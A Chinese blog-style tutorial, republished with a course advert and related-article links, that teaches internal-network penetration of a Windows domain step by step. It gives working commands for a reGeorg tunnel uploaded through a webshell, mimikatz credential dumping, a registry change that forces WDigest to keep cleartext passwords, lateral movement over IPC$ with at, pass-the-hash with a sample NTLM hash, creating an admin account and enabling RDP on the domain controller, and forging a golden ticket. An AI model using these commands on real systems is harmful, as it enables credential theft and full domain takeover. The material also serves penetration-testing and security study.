当前位置: 首页 > article >正文

内网渗透初探保姆级教程!零基础小白从零入门,轻松学会内网渗透核心知识

0x01 基础知识内网渗透从字面上理解便是对目标服务器所在内网进行渗透并最终获取域控权限的一种渗透。内网渗透的前提需要获取一个Webshell可以是低权限的Webshell因为可以通过提权获取高权限。在进行内网渗透之前需要了解一个概念域环境。在内网中往往可能存在几百上千台机器例如需要对机器进行升级、打补丁、设置权限等管理员不可能一台一台地更新修改。因此便衍生出了域环境。管理员以一台主机作为域控制器新建一个域将所有其他主机加入域中以域控来操作其他主机。因为域控的高权限导致了域控所在的主机的管理员账号密码可以登录任意一台主机所以内网渗透的最终目标往往便是拿下域控的权限。首先通过提权获取一个具有管理员权限的账号密码hacker/1234,abcd。具体提权过程就不细说了。下面将利用获取的这个具有管理员权限的账号密码正式开始内网渗透实践。0x02 内网穿透在渗透测试过程中我们拿下了一台服务器的权限并且通过netstat -ano发现开启了3389端口想要远程桌面连接的时候发现无法连接。这是因为我们获取的服务器所处的环境为内网而内网主机的3389端口是公网IP通过端口映射的。也就是说我们连接的外网IP地址的3389端口映射到内网中不一定是那台服务器的3389端口。解决这种问题的方法有两种1、让目标机器去连接外网主机必须有一台公网服务器内网主机能够访问互联网2、在目标机器上设置一个信号站放一个WEB文件在目标机器上所有流量都经过这个文件通信在渗透测试过程中内网主机不能够访问互联网是很常见的下面通过方法2进行内网穿透。一、具体流程1、首先需要一款工具regeorg来建立一个信号站。2、这里以PHP站点为例将tunnel.nosocket.php文件通过之前获取的Webshell上传到站点尝试使用web端访问确定文件存在。3、以python环境运行reGeorgSocksProxy.py脚本将从本机的3344端口经过的数据都发送给目标机器的tunnel.nosocket.php文件。python reGeorgSocksProxy.py -l 127.0.0.1 -p 3344 -u http://192.168.229.151/tunnel.nosocket.php4、使用工具proxifier设置远程桌面软件mstsc.exe的数据包从本地的3344端口出网。5、成功进行内网穿透通过远程桌面连接到目标主机。其他内网穿透方法还有Frp、Ew、nps等都是一些可以穿透的工具原理为搭建一条直通内网的隧道这里就不详细介绍了。0x03 内网信息收集1、使用PsExec.exe获取SYSTEM权限进行内网信息收集需要具有一定的权限所以先进行提权获取SYSTEM权限。PsExec.exe -s -i -d cmd2、获取所有域用户列表使用net user /domain命令获取内网的域为ajie.cool域中具有Administrator、Guest、krbtgt、web用户。3、获取域用户组信息使用net group /domain命令获取域用户组信息。4、获取域管理员列表使用net group “domain admins” /domain 命令获取域管理员列表域管账户只有Administrator。5、获取域服务器的IP地址通过ping 域名称来获取域服务器的IP地址。也可以通过查看dns服务器的IP地址结合进行判断域服务器的IP地址。6、安装Nmap进行扫描前面介绍了Nmap工具在内网渗透过程中也可以通过Nmap获取内网信息。1首先通过Webshell上传Nmap的安装包。2远程连接目标服务器并安装Nmap进行内网信息收集。7、内网主机存活探测因为动静比较大也可以通过nbtscan工具进行。因为相对于Nmap的大规模扫描行为nbtscan基于NetBios进行探测即是相当于windows打开我的电脑中的网络一样被发现的几率相对低一些。0x04 Hash读取此处Hash读取通过工具mimikatz来进行mimikatz是由本杰明·德尔皮创建开发的一个能够从内存中读取hash账号密码的工具也可以说是内网渗透中的神器。下面介绍如何通过mimikatz工具读取服务器内存中存储的hash密码。1、首先以管理员权限打开mimikatz。2、使用privilege::debug提升权限。3、使用sekurlsa::logonpasswords读取到内存中的管理者账号的明文密码和本机的web用户的密码。4、远程桌面登录管理员账号。0x05 Hash传递一、基础知识上面介绍了如何进行Hash读取如果域控管理员使用自己的域控账号登录了服务器那么就可以抓取到域控的账号和密码了。这样的危害性是巨大的所以在渗透测试过程中内网的机器往往会打KB2871997补丁并且修改注册表关闭Wdigest Auth。这样抓取的就不是明文密码了。虽然还是能够获取密文Hash但是密文Hash往往不可逆解开需要花费大量精力。在域环境下检测密码不是先将Hash解密再验证是否正确的。在验证输入的账号密码是否正确的时候是通过验证Hash是否相同来进行校验的。也就是说或许我们可以通过获取的Hash来伪造管理员账号密码登录也就是Hash传递又叫PTH通过将获取的NTLM密文传递到验证登录的机器绕过正常验证进行登录系统。二、Wdigest注册表中的Wdigest功能关系着内存中是否有明文密码通过查看注册表键值可以判断Wdigest功能状态。如果该项值为“1”则为开启即可以获取明文密码如果该项值为“0”则明文密码不会出现在内存中。开启和关闭Wdigest Auth命令如下1开启Wdigest Authreg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f2关闭Wdigest Authreg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f三、IPC$1、概念IPC$(Internet Process Connection)是共享命名管道的资源它是为了让进程间通信而开放的命名管道通过提供可信任的用户名和口令连接双方可以建立安全的通道并以此通道进行加密数据的交换从而实现对远程计算机的访问。IPC$的使用条件 开放了139、445端口 目标开启IPC$文件共享 获取用户账号密码。在内网中默认就会开启IPC$共享文件服务默认会将C盘共享出来也就是说我们可以通过IPC获取目标C盘的权限。2、IPC$常用命令net use查看当前连接的IPC$net use * /del删除IPC$连接net use \192.168.1.1\ipc$ 密码 /user:域\账号连接域内IP地址为192.168.1.1的主机dir \192.168.1.1\c$列出连接的192.168.1.1的C盘文件copy c:/12.txt \192.168.1.1\c$\2.txt复制本地c盘的12.txt文件到192.168.1.1的c盘并保存为2.txt3、IPC$命令执行1、通过at命令制定计划进行命令执行。at \\192.168.1.1 11:15am cmd /c whoami2、通过at命令制定计划进行多层代理的命令执行at \\192.168.100.1 11:15am cmd /c net use \\192.168.200.1\ipc$ 密码 /user:账号at \\192.168.100.1 11:15am cmd /c at \\192.168.100.1 11:15am cmd /c whoami 四、Hash传递实战演示1、首先尝试抓取密码发现获取的全部都是密文。2、这里虽然没有获取到明文密码但是获取了域管理员用户的NTLM。3、提权到SYSTEM权限执行net user /domain获取域管所在的主机地址。4、尝试使用ipc$读取域管的c盘目录显示拒绝访问。5、通过mimikatz工具进行Hash传递。sekurlsa::pth /user:administrator /domain:ajie.cool /ntlm:f1de694efa543bb780da59c049541ea36、执行完之后会弹出一个命令提示符执行dir \AD.ajie.cool\c$成功无需账号密码获取了域控机器的c盘的权限列出了c盘的文件。7、在通过PTH弹出的命令提示符中通过…/跳转到PsExec.exe文件所在目录执行命令提权获取一个域控机器的cmd命令提示符。8、执行ipconfig可以看到是域控所在机器的IP地址成功拿到域控所在机器的权限。9、在域控中新建用户并加到管理员组。10、以新创建的用户远程桌面登录域控发现无法连接远程桌面服务。11、通过reg命令查询注册表查看远程桌面服务发现返回0x01说明远程桌面服务没有开启。开启则返回0x00REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections12、通过拿到的域控的命令提示符来执行修改注册表操作打开远程服务功能。REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /fREG ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x00000d3d /f13、以新建的hackerend用户远程桌面登录域控。0x06 黄金票据一、基础知识前面了解到在域环境中域控的账号密码可以登录域内任意一台主机那么主机是如何检测域控账号密码是否正确的呢检验账号密码可以有两种方法询问域控或者设置一个专门检测账号密码是否正确的第三方中心。在域中便使用到了第三方中心来检验输入的账号密码是否相同。这种第三方中心叫KDC密钥分发中心。以下内容涉及内网的kerboros协议小弟学业不精就简单说一下了。二、KDC密钥分发中心KDCkerberos Distribution Center密钥分发中心维护所有账户的名称和Master Keykey的hash code。提供AS认证服务、TGS票据授予服务。1、AS授权服务Authorization Server对于上面的流程1提供初始授权认证用户表明需求并使用密码对请求进行加密AS用提供的密码对请求进行解密后得到的请求内容返回给用户一个TGT票据授权票据 ticket granting tickets用一个密码加密。2、TGS用户得到TGT之后使用TGT去访问TGS票据授权中心Ticket Granting ServerTGS验证TGT后使用密钥解密返回一个Ticket给用户用户得到Ticket后去访问ServerServer收到Ticket和KDC进行验证通过后提供服务。3、票据在内网渗透中票据分为白银票据和黄金票据。分别对应域普通用户的票据和域管理员的票据。票据就是Kerberos认证协议的Ticket因为已经经过了AS和TGS的校验所以获取了票据之后可以任意登录目标主机。在查询域内用户的时候总会看到一个用户叫krbtgt如图5-37所示。krbtgt账户其实就是KDC秘钥分发中心用的超管账户。我们拿着krbtgt账户的票据去访问域内机器目标主机会认为我们是KDC秘钥分发中心所以直接给了最高的权限允许我们访问。一般管理员会修改域控账号的密码但是很少有管理员会修改Krbtgt的密码。在内网渗透的最后阶段我们需要通过获取黄金票据进行权限维持那么下面将介绍如何获取krbtgt账户的黄金票据。三、实战演示1、首先通过远程桌面将mimikatz.exe和PsExec.exe上传到域控主机。2、通过PsExec提权为SYSTEM然后执行mimikatz输入命令lsadump::dcsync /user:krbtgt 获取krbtgt的hash值。3、这里制作黄金票据需要的数据为Object Security ID : S-1-5-21-3296092892-1320626564-2720975204Hash NTLM: 31edc56a2302a25a2e9bee5f04abd659原Object Security ID最后面有个-502是作为标识的在制作时需要手动删除。4、退出远程桌面在攻击机通过mimikatz制作黄金票据。执行命令后会生成一个AD.kiribi文件。kerberos::golden /admin:administrator /domain:ajie.cool /sid:S-1-5-21-3296092892-1320626564-2720975204 /krbtgt:31edc56a2302a25a2e9bee5f04abd659 /ticket:administrator.kiribi5、制作完票据之后先尝试获取域控的c盘的权限发现拒绝访问。6、通过kerberos::purge清空票据缓存kerberos::list列出票据显示为空说明清空了所以票据。7、通过kerberos::ptt administrator.kiribi加载生成的票据。8、成功无密码获取域控c盘权限后面进一步提权与Hash传递处相仿就不做演示了。0x07 总结以上便是我学习的简单地从外网获取shell经过提权或不提权直接进行内网渗透的一个简单过程其中涉及一些概念问题没有说的很明白希望表哥们提点提点。以上仅为个人学习过程可能知识点过于简单望理解。学习资源如果你也是零基础想转行网络安全却苦于没系统学习路径、不懂核心攻防技能光靠盲目摸索不仅浪费时间还消磨自己信心。这份 360 智榜样学习中心独家出版《网络攻防知识库》专为转行党量身打造01内容涵盖这份资料专门为零基础转行设计19 大核心模块从 Linux系统、Python 基础、HTTP协议等地基知识到 Web 渗透、代码审计、CTF 实战层层递进攻防结合的讲解方式让新手轻松上手真实实战案例 落地脚本直接对标企业岗位需求帮你快速搭建转行核心技能体系这份完整版的网络安全学习资料已经上传CSDN【保证100%免费】**读者福利 |***CSDN大礼包《网络安全入门进阶学习资源包》免费分享 *安全链接放心点击02 知识库价值深度 本知识库超越常规工具手册深入剖析攻击技术的底层原理与高级防御策略并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等提供了独到的技术视角和实战验证过的对抗方案。广度 面向企业安全建设的核心场景渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点是应对复杂攻防挑战的实用指南。实战性 知识库内容源于真实攻防对抗和大型演练实践通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。03 谁需要掌握本知识库负责企业整体安全策略与建设的CISO/安全总监从事渗透测试、红队行动的安全研究员/渗透测试工程师负责安全监控、威胁分析、应急响应的蓝队工程师/SOC分析师设计开发安全产品、自动化工具的安全开发工程师对网络攻防技术有浓厚兴趣的高校信息安全专业师生04部分核心内容展示360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。内容组织紧密结合攻防场景辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合是你学习过程中好帮手。1、网络安全意识2、Linux操作系统3、WEB架构基础与HTTP协议4、Web渗透测试5、渗透测试案例分享6、渗透测试实战技巧7、攻防对战实战8、CTF之MISC实战讲解这份完整版的网络安全学习资料已经上传CSDN【保证100%免费】**读者福利 |***CSDN大礼包《网络安全入门进阶学习资源包》免费分享 ***安全链接放心点击**本文转自网络如有侵权请联系删除。

相关文章:

内网渗透初探保姆级教程!零基础小白从零入门,轻松学会内网渗透核心知识

0x01 基础知识 内网渗透,从字面上理解便是对目标服务器所在内网进行渗透并最终获取域控权限的一种渗透。内网渗透的前提需要获取一个Webshell,可以是低权限的Webshell,因为可以通过提权获取高权限。 在进行内网渗透之前需要了解一个概念&…...

配置MyBatis-Plus打印执行的 SQL 语句到控制台或日志文件中

配置MyBatis-Plus打印 1. 使用 log4j 或 logback 配置 MyBatis-Plus 支持多种日志框架&#xff0c;如 SLF4J, Commons Logging, Log4J, Log4J2 和 JDK logging。这里以 Logback 为例说明如何配置。 在你的 logback.xml 文件中添加如下配置&#xff1a; <configuration>&l…...

内网渗透全流程拆解|从入门到实战,小白也能看懂的步骤

内网渗透不是“盲目尝试”&#xff0c;而是遵循固定流程的系统化操作&#xff0c;核心流程可概括为&#xff1a;信息收集→漏洞利用→权限提升→横向移动→权限维持→痕迹清理&#xff0c;每个环节环环相扣&#xff0c;缺一不可。本文将结合小白易理解的实战场景&#xff0c;详…...

SAP FI模块实战:OBC4配置字段状态变式全流程解析(含常见报错处理)

SAP FI模块深度实战&#xff1a;OBC4字段状态变式配置与冲突解决指南 1. 字段状态变式的核心价值与应用场景 在SAP财务模块中&#xff0c;字段状态变式&#xff08;Field Status Variants&#xff09;是控制会计凭证输入界面的关键配置项。它决定了用户在创建财务凭证时&#x…...

OpenClaw备份恢复:千问3.5-35B-A3B-FP8配置迁移指南

OpenClaw备份恢复&#xff1a;千问3.5-35B-A3B-FP8配置迁移指南 1. 为什么需要备份OpenClaw配置 上周我的开发机突然硬盘故障&#xff0c;不得不重装系统。当我准备重新部署OpenClaw时&#xff0c;突然意识到一个严重问题——过去三个月精心调试的千问3.5模型配置、飞书机器人…...

ECharts折线图入门学习:从基础到实战的完整指南

引言 折线图是数据可视化中最常用的图表类型之一&#xff0c;特别适合展示数据随时间变化的趋势。ECharts作为一款功能强大的JavaScript可视化库&#xff0c;提供了丰富的配置选项和交互功能&#xff0c;能够轻松创建出专业、美观的折线图。本文将带领大家从零开始学习ECharts折…...

别再被@JsonFormat和@DateTimeFormat搞晕了!SpringBoot中时间处理的完整避坑指南

SpringBoot时间格式化终极指南&#xff1a;从JsonFormat到实战避坑 凌晨三点的办公室&#xff0c;咖啡杯已经见底&#xff0c;屏幕上却再次弹出那个熟悉的400错误——"Failed to parse Date value"。这可能是每个Java开发者在处理时间格式时都经历过的噩梦。时间数据…...

第二桌面 + 小龙虾:让企业AI智能体安全落地、全员可用

本文发布于2026年4月1日。引言&#xff1a;从“养虾”到“用虾”&#xff0c;AI落地需要新底座过去几个月&#xff0c;OpenClaw&#xff08;昵称“小龙虾”&#xff09;在开发者圈子里火得一塌糊涂。这个开源AI智能体网关&#xff0c;能听懂人话&#xff0c;还能替你操作电脑、…...

BAR和BA

BAR 是请求方发出的“问题”&#xff1a;“我刚才发的那批数据包&#xff0c;你收到了哪几个&#xff1f;”BA 是接收方回复的“答案”&#xff1a;“我收到了第1、3、4、5个包&#xff0c;第2个没收到。”BAR - Block Ack Request&#xff08;块确认请求&#xff09; 角色与发…...

别等宕机才后悔!UPS蓄电池定期巡检,这4点才是核心!

&#xff5c;机房里设备林立&#xff0c;大多数人把目光聚焦在服务器、精密空调上。但其实&#xff0c;潜伏在机房角落的“隐形杀手”&#xff0c;往往是看起来默默无闻的UPS蓄电池。今天我们不谈复杂的技术参数&#xff0c;只用大白话讲清楚&#xff1a;为什么蓄电池必须定期巡…...

重磅发布!集装箱式SST直流移动智算中心

NEWS3月28日&#xff0c;台达、汉腾科技与龙芯中科联合宣布重磅发布集装箱式 SST&#xff08;固态变压器&#xff09;直流移动智算中心&#xff0c;发布活动于台达吴江制造基地举行。这款全新方案以台达 SST 固态变压器为核心能源支撑&#xff0c;深度集成CPU、AI 加速卡与服务…...

从“工具辅助”到“智慧赋能”:青软青之深度集成LIMS、ELN、AUTO等核心系统,打造全场景智慧实验室新范式

在科研创新迭代加速、检验检测产业升级纵深推进的今天&#xff0c;实验室作为创新源头&#xff0c;其运行效率与管理水平直接决定研发效能与质量。传统依赖人工记录、纸质流转和信息孤岛的模式&#xff0c;已难以适应复杂实验需求与严苛合规监管。智慧实验室&#xff0c;正成为…...

IBM Plex字体家族全攻略:企业级开源字体的应用与实践

IBM Plex字体家族全攻略&#xff1a;企业级开源字体的应用与实践 【免费下载链接】plex The package of IBM’s typeface, IBM Plex. 项目地址: https://gitcode.com/gh_mirrors/pl/plex 企业级字体解决方案的价值解析 在数字产品设计中&#xff0c;字体作为视觉传达的…...

FastAPI系列 4 - 模块化路由的艺术:APIRouter实战指南

1. 为什么需要模块化路由&#xff1f; 第一次用FastAPI开发电商后台时&#xff0c;我把所有路由都堆在main.py里。三个月后这个文件膨胀到2000多行代码&#xff0c;每次修改用户认证逻辑都要在订单处理和商品列表的代码块之间来回翻找。这种经历让我深刻理解了为什么APIRouter会…...

GreenLuma 2025 Manager:Steam游戏库管理工具的一站式解决方案

GreenLuma 2025 Manager&#xff1a;Steam游戏库管理工具的一站式解决方案 【免费下载链接】GreenLuma-2025-Manager An app made in python to manage GreenLuma 2025 AppList 项目地址: https://gitcode.com/gh_mirrors/gr/GreenLuma-2025-Manager GreenLuma 2025 Man…...

class文件加载到内存

‌JVM将class文件加载到内存的过程主要分为三个阶段&#xff1a;加载&#xff08;Loading&#xff09;、链接&#xff08;Linking&#xff09;和初始化&#xff08;Initialization&#xff09;‌&#xff0c;其中链接又细分为验证、准备、解析三个步骤 。 一、加载&#xff08;…...

DS1881对数型数字电位器I²C驱动详解

1. DS1881 数字电位器驱动深度解析&#xff1a;面向嵌入式系统的IC对数型精密控制方案1.1 器件本质与工程定位DS1881 是 Dallas Semiconductor&#xff08;后被 Maxim Integrated 收购&#xff09;推出的单通道 IC 接口对数型数字电位器&#xff0c;其核心价值不在于“可编程电…...

【原创改进代码】考虑电动汽车移动储能特性的多区域电网功率波动平抑优化调控附python代码

✅作者简介&#xff1a;热爱科研的Matlab仿真开发者&#xff0c;擅长毕业设计辅导、数学建模、数据处理、建模仿真、程序设计、完整代码获取、论文复现及科研仿真。 &#x1f34e; 往期回顾关注个人主页&#xff1a;Matlab科研工作室 &#x1f447; 关注我领取海量matlab电子…...

Vue-Super-Flow隐藏玩法:不画图,只填空!手把手教你打造可配置的流程图答题组件

Vue-Super-Flow隐藏玩法&#xff1a;不画图&#xff0c;只填空&#xff01;手把手教你打造可配置的流程图答题组件 在Vue生态中&#xff0c;流程图工具通常被用来构建复杂的可视化编辑界面。但你是否想过&#xff0c;这些工具还能用来做些什么&#xff1f;本文将带你探索一个全…...

AG-UI协议实战:构建智能体驱动的动态前端交互系统

1. AG-UI协议&#xff1a;智能体与前端交互的新范式 第一次听说AG-UI协议时&#xff0c;我正在为一个电商项目头疼——后台AI生成的商品推荐总需要手动同步到前端&#xff0c;代码里到处是setState和事件监听。直到发现这个协议&#xff0c;才明白原来智能体和前端可以像两个老…...

【无标题】vLLM:推理吞吐与尾延迟的资源真相

Chunked Prefil 大小影响哪些&#xff1f; 影响TPOT 和TTFT。 吞吐吗。 吞吐是怎么定义的&#xff1f; 以及QPS怎么定义的&#xff0c;以及并发树的关系&#xff1f; https://support.huaweicloud.com/intl/en-us/bestpractice-modelarts/modelarts_llm_infer_5906026.html Red…...

轻流MCP|让AI从「会回答」走向「能参与实际业务」

当越来越多企业开始把 AI 引入日常工作&#xff0c;一个现实问题也越来越突出&#xff1a; AI 怎么真正接入业务系统&#xff0c;而不是只停留在聊天层&#xff1f; 过去&#xff0c;很多 AI 更擅长回答问题、生成内容、整理信息。它可以帮助人更快完成写作、总结和分析&#x…...

若依管理系统实战:基于Vuex的用户角色权限与动态菜单路由解析

1. 若依管理系统权限控制核心逻辑解析 若依管理系统作为一款基于SpringBoot和Vue的企业级中后台解决方案&#xff0c;其权限控制体系设计得非常精巧。我在实际项目中使用这套方案时&#xff0c;发现它通过前后端协同工作&#xff0c;实现了细粒度的权限管理。整个流程可以概括为…...

VBA数据库解决方案第二十九讲 如何批量修改数据库中的数据

《VBA数据库解决方案》教程&#xff08;版权10090845&#xff09;是我推出的第二套教程&#xff0c;目前已经是第二版修订了。这套教程定位于中级&#xff0c;是学完字典后的另一个专题讲解。数据库是数据处理的利器&#xff0c;教程中详细介绍了利用ADO连接ACCDB和EXCEL的方法…...

汇智信科-机场数字孪生系统

机场数字孪生系统以数字化孪生技术构建机场全要素虚拟映射&#xff0c;精准还原机场、跑道、塔台等设施及飞机运行状态&#xff0c;支持多维度动态监测与可视化管控&#xff1b;通过模拟飞机调度、跑道滑行等全流程作业场景&#xff0c;覆盖机场多角色业务协同&#xff0c;同时…...

竞赛获奖保研加分测评:除了挑战杯,哪些垂直赛事含金量更高?

在 2026 年推免&#xff08;保研&#xff09;竞争进入白热化的背景下&#xff0c;工科学子的加分项已不仅仅是绩点的博弈&#xff0c;更是工程实战能力的短兵相接。随着教育部《关于加强新时代卓越工程师培养的指导意见》的深入实施&#xff0c;各大名校对人才的评价标准正从“…...

腾讯云轻量服务器+宝塔面板:新手零代码搭建个人网站的保姆级避坑指南

腾讯云轻量服务器宝塔面板&#xff1a;新手零代码搭建个人网站的保姆级避坑指南 你是否曾经想过拥有一个属于自己的网站&#xff0c;却因为不懂代码和服务器运维而望而却步&#xff1f;现在&#xff0c;即使你没有任何技术背景&#xff0c;也能轻松实现这个梦想。本文将带你一步…...

湖南石材结晶公司

在长沙&#xff0c;无论是高端商场、星级酒店&#xff0c;还是政务大厅、三甲医院&#xff0c;光洁如镜、平整如砥的石材地面&#xff0c;都是其专业形象与高端质感的直接体现。然而&#xff0c;石材作为“面子工程”&#xff0c;长期承受高频人流、设备碾压&#xff0c;极易出…...

APRSPacketLib:嵌入式C库实现APRS协议编解码

1. APRSPacketLib 项目概述 APRSPacketLib 是一个专为业余无线电&#xff08;Ham Radio&#xff09;领域设计的轻量级嵌入式 C 语言库&#xff0c;核心目标是 在资源受限的微控制器平台上高效完成 APRS&#xff08;Automatic Packet Reporting System&#xff09;协议数据包的…...

Ubuntu 24.04 内核 Kernel Panic 问题排查与解决流程(第二次出现该问题后,永久性解决)

问题描述 系统更新后重启&#xff0c;出现以下错误&#xff1a; Kernel panic - not syncing: VFS: Unable to mount root fs on unknown-block(0,0)系统无法正常启动。问题原因分析 错误含义 内核在启动过程中无法找到并挂载根文件系统。unknown-block(0,0) 表示内核完全不知道…...